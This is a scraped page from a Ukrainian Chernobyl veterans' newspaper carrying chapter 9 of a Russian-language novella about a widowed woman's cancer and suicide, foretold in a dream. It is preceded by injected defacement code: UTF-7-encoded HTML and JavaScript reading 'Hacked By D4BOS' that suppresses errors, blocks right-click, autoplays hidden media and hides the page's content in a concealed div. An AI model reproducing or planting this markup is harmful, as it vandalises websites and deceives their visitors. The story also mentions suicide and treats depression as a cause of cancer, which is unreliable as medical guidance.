+ADw-/title+AD4 +ADw-script language+AD0AIg-JavaScript1.2+ACIAPg function ClearError() +AHs-return true+ADsAfQ window.onerror +AD0 ClearError+ADs +ADw-/script+AD4 +ADw-title+AD4AfA 0wn3d+ADw-/title+AD4 +ADw-html+AD4APA-/head+AD4 +ADw-title+AD4-Hacked By D4BOS+ADw-/title+AD4 +ADw-head+AD4APA-link rel+AD0AIg-shortcut icon+ACI href+AD0AIg-http://img.webme.com/pic/i/iconvar/turk-b-11.png+ACI-/+AD4APA-/head+AD4 +ADw-body bgcolor+AD0AIg-black+ACIAPg +ADw-center+AD4APA-br+AD4APA-br+AD4 +ADw-div class+AD0AIg-imagehold+ACIAPg +ADw-img src+AD0AIg-https://i.hizliresim.com/2rXYqL.jpg+ACI alt+AD0AIg-width+AD0AIg-600+ACI height+AD0AIg-450+ACI style+AD0AIg-padding-top:0px+ACI-/+AD4APA-br+AD4APA-br+AD4 +ADw-div style+AD0AIg-color:white+ADs-font:12pt Courier New+ADsAIgA+ADw-b+AD4APA-/font+AD4APA-font color+AD0AIgAj-FF0000+ACIAPgA8-/font+AD4APA-/div+AD4APA-/b+AD4 +ADw-div style+AD0AIg-color:white+ADs-font:9pt Courier New+ADsAIgA+ADw-/font+AD4APA-/div+AD4APA-/b+AD4 +ADw-div style+AD0AIg-color:red+ADs-font:12pt Courier New+ADsAIgA+ADw-b+AD4-Hacked By D4BOS+ADw-/font+AD4APA-font color+AD0AIgAj-FF0000+ACIAPgA8-/font+AD4APA-/div+AD4APA-/b+AD4 +ADw-div style+AD0AIg-color:white+ADs-font:9pt Courier New+ADsAIgA+ADw-/b+AD4APA-/font+AD4APA-/div+AD4APA-br+AD4 +ADw-div style+AD0AIg-color:white+ADs-font:15pt Courier New+ADsAIgA+ADw-b+AD4-D4BOS+ADs-Taktik yok bam bam +ADw-/b+AD4APA-img width+AD0AIg-20+ACI src+AD0AIg-https://www.emojibase.com/resources/img/emojis/apple/x1f52b.png.pagespeed.ic.kmplwnKCyI.png+ACIAPgAm-nbsp+ADsAPA-img src+AD0AIg-https://www.emojibase.com/resources/img/emojis/apple/x1f52b.png.pagespeed.ic.kmplwnKCyI.png+ACI width+AD0AIg-20+ACIAPgA8-br+AD4 +ADw-/font+AD4APA-/div+AD4APA-br+AD4 +ADw-div style+AD0AIg-color:grey+ADs-font:12pt Courier New+ADsAIgA+-DeadlyCrew.info+ADw-/font+AD4APA-/div+AD4APA-br+AD4 +ADw-div style+AD0AIg-color:white+ADs-font:11pt Courier New+ADsAIgA+ADw-/font+AD4APA-font color+AD0AIgAj-FF0000+ACIAPg +ADw-/font+AD4APA-font color+AD0AIgAj-545454+ACIAPgA8-/font+AD4APA-/div+AD4APA-br+AD4APA-/div+AD4APA-/b+AD4 +ADw-b+AD4 +ADw-div style+AD0AIg-color:red+ADs-font:9pt Courier New+ADsAIgA+ADw-b+AD4 +ADw-div style+AD0AIg-color:red+ADs-font:15pt Courier New+ADsAIgA+-d4bos.wordpress.com+ADw-/font+AD4APA-/div+AD4APA-br+AD4 +ADw-p align+AD0-center style+AD0AIg-text-align:center+ACIAPgA8-b+AD4APA-br+AD4 +ADwAIQ—hacked by D4BOS–+AD4 +ADw-/body+AD4 +ADw-embed src+AD0AIg-http://www.youtube.com/v/uCrm9RghRjU?version+AD0-3+ACY-amp+ADs-hl+AD0-en+AF8-US+ACY-amp+ADs-rel+AD0-0+ACY-amp+ADs-autoplay+AD0-1+ACI type+AD0AIg-application/x-shockwave-flash+ACI width+AD0AIg-1+ACI height+AD0AIg-1+ACI allowscriptaccess+AD0AIg-always+ACI allowfullscreen+AD0AIg-true+ACIAPgA8-/embed+AD4 +ADw-SCRIPT LANGUAGE+AD0AIg-Javascript+ACIAPgA8ACE— // +ACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKg // +ACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKg // +ACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKgAqACoAKg var isNS +AD0 (navigator.appName +AD0APQ +ACI-Netscape+ACI) ? 1 : 0+ADs var EnableRightClick +AD0 0+ADs if(isNS) document.captureEvents(Event.MOUSEDOWN+AHwAfA-Event.MOUSEUP)+ADs function mischandler()+AHs if(EnableRightClick+AD0APQ-1)+AHs return true+ADs +AH0 else +AHs-return false+ADs +AH0 +AH0 function mousehandler(e)+AHs if(EnableRightClick+AD0APQ-1)+AHs return true+ADs +AH0 var myevent +AD0 (isNS) ? e : event+ADs var eventbutton +AD0 (isNS) ? myevent.which : myevent.button+ADs if((eventbutton+AD0APQ-2)+AHwAfA(eventbutton+AD0APQ-3)) return false+ADs +AH0 function keyhandler(e) +AHs var myevent +AD0 (isNS) ? e : window.event+ADs if (myevent.keyCode+AD0APQ-96) EnableRightClick +AD0 1+ADs return+ADs +AH0 document.oncontextmenu +AD0 mischandler+ADs document.onkeypress +AD0 keyhandler+ADs document.onmousedown +AD0 mousehandler+ADs document.onmouseup +AD0 mousehandler+ADs //–+AD4 +ADw-/script+AD4APA-DIV style+AD0AIg-DISPLAY: none+ACIAPgA8-xmp+AD4-

Газета Всеукраїнської Спілки ліквідаторів-інвалідів "Чорнобиль-86". Всеукраїнський часопис для інвалідів Чорнобиля, ліквідаторів, чорнобилян.
24.10.2013, рубрика "Проза"

В  созвездии  рака

Художественно-публицистическая повесть

Глава 9

Когда моя мама была еще жива, мы  с мужем часто  к ней  приезжали.  Радовалась она этому,  как ребенок. Я ведь у нее была одна. Иногда  обстоятельства складывались так, что до поселка, где она жила и где я выросла, мы добирались уже поздним вечером. Тогда мы неизменно удивлялись потрясающему ночному небу, сверкающему россыпью звезд.  В большом городе из-за задымленной атмосферы и освещенности такого не увидишь. А воздух! Как только мы выходили из машины и он вливался в легкие, как прояснялось в голове, исчезала усталость и поднималось настроение.

Мы стучали в окно, слышали, как мать встает. В доме вспыхивал свет и я уже прислушивалась к торопливым шаркающим ее шагам. Я с тоской вспоминаю те минуты. Родное лицо, мелодичный ее голос. Некоторое время я сидела в блаженстве, оглядывая знакомую обстановку, вдыхая запахи жилища, в котором выросла, и слушала новости.

На следующий день мы вставали позже, чем обычно. Уставшие,  с кучей проблем, издерганные  «прелестями» современной городской жизни, мы могли бы поспать и дольше, но нас будила непривычная тишина. Мы вскакивали и выходили во двор. Неизменно заставали мать за каким- то делом. Она или работала в огороде, или кормила своих животных, или убиралась, поскольку завтрак уже был готов.

Шли года и я с душевной болью замечала, что мать начинает сдавать. И тогда я неизменно возвращалась к давним мыслям о том, почему же сельские жители не живут дольше городских. Ведь они дышат свежим воздухом, пьют чистую воду, едят натуральные продукты.

Загадка. Со временем многое мне стало понятней, но сейчас, вспоминая те поездки и впечатления от них,   мне неизменно приходит на ум один случай. Забыть его невозможно, настолько все обстоятельства были  драматичными и даже трагическими, да еще и окутаны мистикой.

В один из таких приездов, а было это летом, мама  попросила меня  сходить в центр поселка с целым списком поручений. Уже тогда   такие походы  ее изматывали, и она ждала нашего приезда, чтобы решить какие- то свои проблемы. На этот раз она попросила уплатить по счетам и зайти на почту – уже не помню, зачем. Неважно.

И вот, управившись с основными  заданиями,  я повернула с центральной улицы, чтобы зайти на почту. Настроение, помню, было прекрасное. И погода вдохновляла. Я шла небольшим сквериком, вдыхала свежий воздух и слушала пение птиц. Господи, разве догадываешься в молодости, что когда то может быть иначе! Что может болеть голова или сердце, что над тобой, словно домоклов меч, будет довлеть угроза самому твоему существованию… Помню, я тогда воспринимала пожилых людей, как кого то из другой реальности…

Но вот навстречу мне идет молодая худая женщина. Она несет ребенка. Пухленький такой симпатичный малыш. Крупненький. И мне кажется , что ноги у матери просто подкашиваются от его веса. А рядом, чуть не обнимая ее , идут еще двое, на вид погодки. Я посочувствовала женщине, так как увидела в них неприкаянность, какую- то неухоженость и неблагополучие. Какое же было мое изумление, когда, поравнявшись со мной, женщина приостановилась и поздоровалась.

- Ты, конечно, меня не узнаешь, - сказала она бесцветным голосом.

Я присматривалась и уже начала понимать, что мы раньше виделись.

- Да Света я, помнишь, на заправочной работаю.

И меня озарило. И я чуть было не вскрикнула: « Да что же с тобой случилось!»

Света и так понимала, что узнать в ней веселую хохотушку невозможно. Серое осунувшееся лицо, бесцветные глаза и неряшливые волосы.

И ее словно прорвало. Она рассказывала о своем горе, а я, как пригвожденная, стояла и слушала.

Оказывается, у нее погиб муж. Точнее, год назад его убили.  И она прошла все круги ада.    Это  ее подкосило в буквальном смысле. Ее глаза просто пылали, когда она рассказывала про тот страшный вечер, когда это случилось.

- А кто же это совершил? – спросила я, от души ей сочувствуя.

- Не знаю. Никто не знает.

- Как? Не поймали еще?

Она посмотрела на меня странным долгим взглядом:

- Я сильно сомневаюсь, что это злодеяние вообще расследуется. Ну, не знаю.

Я глянула на детей. Не то, что совсем плохо они выглядели, но…неважно.

- Моей зарплаты на то, чтобы и кормить их нормально и одевать, просто не хватает, -  ответила она на мой немой вопрос.

Оказалось,  у нее не осталось никого. Родители умерли несколько лет назад. А  мать и отец  покойного мужа так растворились в своем горе, что она с внуками как бы перестала для них существовать. Всякое бывает!

Я принялась утешать ее, но быстро поняла, что это бесполезно. Нет таких слов в мире  и нет в мире ничего такого, что  могло бы ей помочь. Особенно поразил и растревожил меня ее взгляд. В никуда.  Словно она где то не тут, не возле меня и не с  детьми.

Я возвращалась домой в потрясении.

Может, поэтому и приснился мне очень странный и плохой сон. Именно о Свете.

Вроде бы иду я странным подземным сооружением, где полы и стены  из поеденного ржой металла. Бреду, уставшая, какими- то  мостиками и переходами и думаю о том, что  пора уже возвращаться. Что промедление опасно, поскольку можно  тут и остаться.  А я знаю, что это ужасно.   И тут боковым зрением вижу в стороне  знакомый силуэт,  а лицо… оно меня просто пугает, и я стараюсь понять, чем же. Поворачиваюсь – Света. Подхожу.  А она  и не видит меня. Измученное  лицо, а взгляд, как при нашей встрече наяву, устремлен в никуда. Что-то в ее облике наводит на меня уже не просто страх, а ужас. Присматриваюсь. Под правой грудью внутри ее что-то темное . Похожее на краба. С ладонь. Темное и зловещее. Оно тихо шевелится, стараясь  углубиться своими щупальцами поглубже.  Я пытаюсь предупредить ее, но, как это бывает во сне,  не могу и слова произнести. Но отчетливо понимаю, что женщина даже не подозревает о какой-  то  болезни у нее внутри. И вдобавок чувствую, что время моего пребывания в том мрачном месте быстро уходит. Бегу по тускло освещенным коридорам, и так мне тяжело, сердце чуть с груди не выскакивает. И вот вижу впереди свет. Потом знакомую лужайку за поселком и до боли родную тропинку домой.

Утром рассказываю свой сон маме. Она как раз накрывает на стол. Руки ее замирает, лицо делается озабоченным и хмурым.

- Плохой сон, – говорит она.

- Да. Я и сама это  поняла. Но что он значит?

- И для тебя нехороший, и для этой твоей знакомой . Над ней нависла угроза тяжелой болезни.

- Беда сама не ходит.

И я рассказала маме историю Светы.

Но что мы могли? Не пойдешь ведь пугать ее сном. Мы уже надумали помочь ей овощами и какой-то суммой денег, но адреса ее я не знала. И фамилии тоже. А ездить и расспрашивать людей по приблизительным данным в тот раз не было ни времени ни возможности.

А потом я простудилась и поездка к матери перенеслась сначала  на две недели, потом еще на две, поскольку муж еще не получил деньги, потом пошли ливни. И только через полтора месяца мы прибыли в родные места.

Установилась погода, было еще по-летнему тепло, хотя месяц сентябрь уже подходил к концу. Мы помогли матери выкопать овощи и спрятать урожай на хранение.  И только на следующий день мама сказала мне страшную новость. Она узнала это от своих знакомых, которые жили на противоположной стороне поселка . И по описанию ситуации догадалась, о ком идет речь.

Света узнала, что заболела на рак  и повесилась. Детей забрали органы опеки.

Я этой новостью была оглушена. Стечение многих обстоятельств повлияло на судьбу этой женщины.  И я только  приблизительно представляю, что  она пережила и как решилась на роковой шаг.

Только спустя некоторое время я вспомнила страшный сон. Я не могла  понять, каким образом мое сознание уловило катастрофическое состояние Светы. И что за жуткое место посетила я во сне. И, главное, зачем мне был послан.  Даже если бы я рассказала о нем Свете, даже если бы она поверила в него, это уже ничего не изменило бы, ведь у нее была последняя стадия.

И вот, спустя годы, я читаю литературу  о том, что онкологические болезни признаны социальными. Что, оказывается, им подвержены больше бедные и неблагополучные. И что большое влияние на их возникновение имеет психика, депрессивные состояния . Боязнь завтрашнего дня, разочарование в социальной справедливости, утраченные иллюзии детства и юношества, обиды и потрясения, нелюбимая работа, невозможность реализоваться, скандалы и непонимание в семье и многое другое способствуют развитию онкозаболеваний.   И жизнь, многие драматические примеры тому подтверждение.

Я вспомнила своих соседок по палате. По той или иной причине они часто переживали. Нельзя сказать, что все из бедных семей. Но внутреннее неблагополучие или особенная уязвимость психики были на лицо.

Получается, не надо впадать в отчаяние, когда тебя преследуют неудачи. Надо иметь терпение и  с надеждой смотреть в будущее. Надо находить, для чего стараться выжить. Или,  хотя бы пожить подольше, например, ради своих малолетних детей. Ведь каждый проведенный день с ними бесценный.

Продолжение следует…

Запись была опубликована: glavred(ом) Четверг, 24 октября 2013 г. в 9:43
и размещена в разделе Проза.
Вы можете следить за ответами к этой публикации через ленту RSS 2.0.
Вы можете оставить ответ или trackback с вашего сайта.

Оставить комментарий

 

Полный анализ сайта